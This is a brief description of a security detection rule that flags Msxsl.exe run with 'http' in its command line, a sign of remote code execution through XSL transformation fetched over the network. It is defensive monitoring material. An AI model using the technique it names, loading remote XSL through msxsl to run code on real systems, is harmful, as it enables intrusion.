This detection rule monitors for the execution of the Msxsl.exe binary with an 'http' keyword present in the command line. The presence of 'http' typically signifies that an XSL file is being accessed over a network, suggesting a potentially malicious attempt at remote execution via XSL transformation. As Msxsl.exe is not part of the standard installation on Windows systems and is generally deprecated, such executions could indicate abnormal activity. The rule captures process creation events where the executable ends with 'msxsl.exe' and checks the command line arguments for the inclusion of 'http'. Given that the tool is seldom used legitimately, the detection level is considered high.